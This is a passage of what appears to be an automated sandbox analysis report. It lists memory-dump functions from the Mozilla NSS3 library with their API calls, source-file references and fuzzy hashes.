                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C4DCE40
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3748922049-0
                                                                                                                                                                                                                                                      • Opcode ID: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
                                                                                                                                                                                                                                                      • Instruction ID: 9538587150d1a1a6fdc86a3a27b3554f0732d2339f25fd19e859184d3eae6515
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1551A1B6A001119BEB10FF69DC50FAA73F5AF48359F260528D84997740EB31F905CBD1
                                                                                                                                                                                                                                                      Function 6C4EFFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD076,00000000), ref: 6C4EFFE5
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C4F0004
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C4F001B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnterMonitor$ErrorValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3413098822-0
                                                                                                                                                                                                                                                      • Opcode ID: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
                                                                                                                                                                                                                                                      • Instruction ID: 723a01fe9171b1fabd2cba15f002211bcbaccebfb7f3a345d2a2a6c20d1a221a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD4128B5244680CBE720CB28DD51FAB73A1DBC1349F10053DD46BCAF90E77AA94BC642
                                                                                                                                                                                                                                                      Function 6C4AEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C4AEF38
                                                                                                                                                                                                                                                        • Part of subcall function 6C499520: PK11_IsLoggedIn.NSS3(00000000,?,6C4C379E,?,00000001,?), ref: 6C499542
                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C4AEF53
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32 ref: 6C4B4C4C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C4AEF9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AEFC3
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4AF016
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AF022
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2459274275-0
                                                                                                                                                                                                                                                      • Opcode ID: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                                                      • Instruction ID: 771c71377bd5c236ad001a0f2338ee9dbe3b3de0b14c86f21d76ec03eb7cfc8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43417171E01109ABEF01CFE9DC85FEE7BB5EB58358F004029F914A6750E77299168BA1
                                                                                                                                                                                                                                                      Function 6C484860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C484894
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848CA
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848DD
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C4848FF
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C484912
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C48494A
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 759476665-0
                                                                                                                                                                                                                                                      • Opcode ID: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
                                                                                                                                                                                                                                                      • Instruction ID: 8259dedcdb35d900bb7581058a460a90aaa79fe2ff848a0a2988d83cff5989a3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2341D274A06305ABE710CE69CC90FAB73EC9F8429DF40052CEA5997B81F770E904CB92
                                                                                                                                                                                                                                                      Function 6C49CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000060), ref: 6C49CF80
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C49D002
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C49D016
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49D025
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C49D043
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49D074
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3361105336-0
                                                                                                                                                                                                                                                      • Opcode ID: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
                                                                                                                                                                                                                                                      • Instruction ID: cd6f0a339e5e5a64f23b45d2358660fbcc702bb750a4583bba4735693d5b3c0a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 904161B0A012218FEB10DF29C884F9ABFB4AF4835DF154169DC198BB56D774D885CBE1
                                                                                                                                                                                                                                                      Function 6C4E3FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E3FF2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E4001
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C4E400F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C4E4054
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C47BC24
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BC39
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C47BC58
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C47BCBE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E4070
                                                                                                                                                                                                                                                      • NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C4E40CD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3882640887-0
                                                                                                                                                                                                                                                      • Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                      • Instruction ID: 024074b332031b399c2a669e95d2cd2f65bfc5c5deb53bc9044effd651d28dac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E31E771E0034197EB00DFA49C41FBA3374AF9975DF165238EE099BB42FB61E95882D2
                                                                                                                                                                                                                                                      Function 6C482E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C472D1A), ref: 6C482E7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C482EDF
                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C482EE9
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C472D1A), ref: 6C482F01
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C472D1A), ref: 6C482F50
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C482F81
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 287051776-0
                                                                                                                                                                                                                                                      • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                      • Instruction ID: 8682b2fc8d0834e62865409b8ed5583c8029c3b12f2c589c8e67cbe18bafb401
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA31E1715031018BE730C659DC48FBFB265EB80319F64097AD62997AD0EF31D88AD665
                                                                                                                                                                                                                                                      Function 6C470E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,6C470A2C), ref: 6C470E0F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C470A2C), ref: 6C470E73
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C470A2C), ref: 6C470E85
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C470A2C), ref: 6C470E90
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C470EC4
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C470A2C), ref: 6C470ED9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3618544408-0
                                                                                                                                                                                                                                                      • Opcode ID: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                                                      • Instruction ID: aaab6deb05cf1f27de5f81ae12faad1ec30d3399fbeda5048973e983c46ac478
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC212E72E0228457EB30C5665C45FEF72AEDBC1649F194035D81867B42EB62D81582F1
                                                                                                                                                                                                                                                      Function 6C47AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47AEB3
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C47AECA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47AEDD
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C47AF02
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C599500), ref: 6C47AF23
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
